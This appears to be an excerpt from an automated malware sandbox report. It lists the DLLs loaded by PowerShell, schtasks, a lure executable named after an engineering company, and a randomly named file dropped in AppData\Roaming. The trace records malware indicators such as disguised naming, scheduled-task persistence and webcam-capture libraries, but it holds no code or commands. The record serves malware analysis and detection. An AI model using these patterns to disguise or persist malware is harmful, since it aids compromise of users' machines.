Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
